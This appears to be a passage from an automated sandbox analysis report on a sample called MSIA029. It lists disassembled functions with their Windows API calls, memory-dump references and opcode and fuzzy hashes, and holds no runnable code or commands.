                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2853612939-0
                                                                                                                                                                                                                                                  • Opcode ID: 1963a2753b14aed351c83e1bb305f06eae1e69f13be0c610b306c0066d0f631c
                                                                                                                                                                                                                                                  • Instruction ID: 089788068f2cff7e507da65f31771bc4f0926189e41acd24acf59d87f6bb3800
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1963a2753b14aed351c83e1bb305f06eae1e69f13be0c610b306c0066d0f631c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C11C632E046589BC7359F59DC55B66F7FCE785735F00452AEC1AD3250EB35BC009690
                                                                                                                                                                                                                                                  Function 00F5E270 Relevance: 3.4, APIs: 2, Instructions: 449COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                                                                                  • Instruction ID: 38e9b64328072e31f60f3f8581d6a28a92afe0915ad9bda8fb339108800f693b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3b8607f755f17a23646f2bf370a959f638319f8f7f89048cc653de111095432
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9DF14F75E002199FDF18CF68C9806ADBBB1FF98325F158269E915EB381D730AE05DB90
                                                                                                                                                                                                                                                  Function 00F67B1F Relevance: 1.9, APIs: 1, Instructions: 408timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00F67F64,00000000,00000000,00000000), ref: 00F67E23
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InformationTimeZone
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 565725191-0
                                                                                                                                                                                                                                                  • Opcode ID: 37f2790e8954fcd10a80cd05a26a6be4383d9fc03aae74a9e1301627f457981f
                                                                                                                                                                                                                                                  • Instruction ID: 3b78e7bc12ae1ab00268f03ffad6e164baebd6832a4a0b94cb3c86382bc8a2c0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37f2790e8954fcd10a80cd05a26a6be4383d9fc03aae74a9e1301627f457981f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38C10472D04315ABDB20BB64DC02ABEB7B9EF45768F254156F900EB291E7349E40F790
                                                                                                                                                                                                                                                  Function 00F684BD Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F684B8,?,?,00000008,?,?,00F714E4,00000000), ref: 00F686EA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                  • Opcode ID: 98bd787caaf085d8fe6267909a8f736e51c590cbb9e50626d0480eb58a7612e9
                                                                                                                                                                                                                                                  • Instruction ID: 78d70959cb836676fff4aaf59ca2ea08e170cb6210759ec69b343e691376a4a0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98bd787caaf085d8fe6267909a8f736e51c590cbb9e50626d0480eb58a7612e9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84B14D32610605DFDB14CF28C486B657BA0FF453A4F29865CE99ACF2A1CB35ED92DB40
                                                                                                                                                                                                                                                  Function 00F535A9 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F535BF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b79e03c034e45ec1bba1a204a0f6e05ddf28e902affe2ca975e36635ddce23f
                                                                                                                                                                                                                                                  • Instruction ID: 3de8e7afebb82ed71178099fdce8dc48af59ffd538feb4babfd9894ce093413f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b79e03c034e45ec1bba1a204a0f6e05ddf28e902affe2ca975e36635ddce23f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF51A5B2D14219DBDB15CF98E885BB9B7F0FB08395F14842AC905E7350D374AA04EF90
                                                                                                                                                                                                                                                  Function 00F6AF79 Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f9a159c4ef85b6c8d4d8c602aecef94e7db36e7d823af915d6e34e51654e27e2
                                                                                                                                                                                                                                                  • Instruction ID: 0d938f08757f25fbc07199b381e041334b5c4069d99cfdfea2bfbebb8f24287b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9a159c4ef85b6c8d4d8c602aecef94e7db36e7d823af915d6e34e51654e27e2
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BF31A67690021DBFCB20EFA9CC859BBBB7DEB85350F144159F915D7244EA31DD409BA0
                                                                                                                                                                                                                                                  Function 00F5A587 Relevance: 1.6, Strings: 1, Instructions: 344COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                  • Opcode ID: bd384aa7c1d0e7ff51b99a16a97775445a99553e6d81fb55e2e232814f0b0a7d
                                                                                                                                                                                                                                                  • Instruction ID: da276b193f99ae273066fcd6037e0bb62ba975c9ea5342d0e334d7ee4b4729be
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd384aa7c1d0e7ff51b99a16a97775445a99553e6d81fb55e2e232814f0b0a7d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9C1C2709006468FCB24CF28C494A7EBBB1BF05322F184719DE5697291D734ED6EEB52
                                                                                                                                                                                                                                                  Function 00F6E48A Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E4DE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                  • Opcode ID: d0f5d1fe97232f106c09e6d531da2e9b47e1835439e6b3c933215d3e0fedec95
                                                                                                                                                                                                                                                  • Instruction ID: a958949e8646f068c7819cd6229c7a4ce1b5d1d4b308a7f39312b0ace3e6a7e3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0f5d1fe97232f106c09e6d531da2e9b47e1835439e6b3c933215d3e0fedec95
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F921C577A14206ABDB28AF25DC41ABA73ACEF04724F140079FD06D6141FB74DD05E750
                                                                                                                                                                                                                                                  Function 00F6E111 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F6E237,00000001,00000000,?,-00000050,?,00F6E868,00000000,?,?,?,00000055,?), ref: 00F6E183
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                  • Opcode ID: 9d8a0bff87e240db03cca5d82f9c7734f0c3b3d98d47f35b79758a5fdaf5d913
                                                                                                                                                                                                                                                  • Instruction ID: 0725f266e5740cd23ed78a6e01089d939ee25f08ad0ee529f78133f39418f580
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d8a0bff87e240db03cca5d82f9c7734f0c3b3d98d47f35b79758a5fdaf5d913
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD11293F6007059FDB189F38C8A15BAB792FF80729B15442DE54647A40D371B942EB40
                                                                                                                                                                                                                                                  Function 00F6E6B9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F6E453,00000000,00000000,?), ref: 00F6E6E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                  • Opcode ID: 3c3fc30aa3c5cc7f520808129093d1307a7ed813101723cabb5eea06486d52a6
                                                                                                                                                                                                                                                  • Instruction ID: f409b08327f107384aff5b889fb5fb38dfa1bfad7bcebb25f6a5104a109fd665
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c3fc30aa3c5cc7f520808129093d1307a7ed813101723cabb5eea06486d52a6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0CD3BE00216BFDB285B65CD09BFA7768EB40764F150434EC25A3180EA74FD41E690
                                                                                                                                                                                                                                                  Function 00F6E1AC Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F6E48A,00000001,?,?,-00000050,?,00F6E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F6E1F6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                  • Opcode ID: 124c27885cbb933f6d0b6f07904401e5df9ea11c4c8116ef4825dd9ad3f0e001
                                                                                                                                                                                                                                                  • Instruction ID: 565baff672d582cdd84a9d114cb362f309eb838ecf6fa59a3f6aba56e52de293
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 124c27885cbb933f6d0b6f07904401e5df9ea11c4c8116ef4825dd9ad3f0e001
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EDF0463B6003085FCB246F348C85A7A7BA5EF81B28F04442CF9058BA80C6B19C42EB50
                                                                                                                                                                                                                                                  Function 00F67132 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F61C9A: EnterCriticalSection.KERNEL32(-00F8DE50,?,00F63576,?,00F8A078,0000000C,00F63841,?), ref: 00F61CA9
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F67125,00000001,00F8A1D8,0000000C,00F67554,00000000), ref: 00F6716A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                                  • Opcode ID: 1cc31c5de00269435824bb70e42b7305ae2be7675923531357c2cbe3ec41fb22
                                                                                                                                                                                                                                                  • Instruction ID: 56841a6575aaa74c74a539b30b4963ddbf895556ee2bf8ff2c5af5ad54bf6ea4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cc31c5de00269435824bb70e42b7305ae2be7675923531357c2cbe3ec41fb22
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BFF06D72A54304DFDB00EF98E846BAC7BF0FB49725F00456AF514DB2A0DB798940AF51
                                                                                                                                                                                                                                                  Function 00F6E0C6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F6E01F,00000001,?,?,?,00F6E88A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6E0FD
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                  • Opcode ID: 15af00a1e83d87e45ce5d82138f5d822c7ee3ae8958231daf486d2ecf762b566
                                                                                                                                                                                                                                                  • Instruction ID: d3564c6e7a90e1cf378ff7dcd12896b555dcb7049e909a6de98a7235ef2985e5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15af00a1e83d87e45ce5d82138f5d822c7ee3ae8958231daf486d2ecf762b566
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09F02B3F700309ABCB04AF35DC4566A7F95EFC1B60F06406CEA098F651C6B5D882EB90
                                                                                                                                                                                                                                                  Function 00F523F8 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00F500E2,00000000,00000000,00000004,00F4ED14,00000000,00000004,00F4F127,00000000,00000000), ref: 00F52410
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                  • Opcode ID: 5ba443001a0ac2d42cf5b9ffd2681b2e74b2ea3121636da5328abaf04e374427
                                                                                                                                                                                                                                                  • Instruction ID: 9c0e8601ae8129d8dc2c47885a8a416ae76def8581ab28156a3b743d35a307f3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ba443001a0ac2d42cf5b9ffd2681b2e74b2ea3121636da5328abaf04e374427
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAE0D832A54104BAD755DBB89E0FFBA7698E70271BF504251EE02D40D2DBA1CA44B161
                                                                                                                                                                                                                                                  Function 00F676AF Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
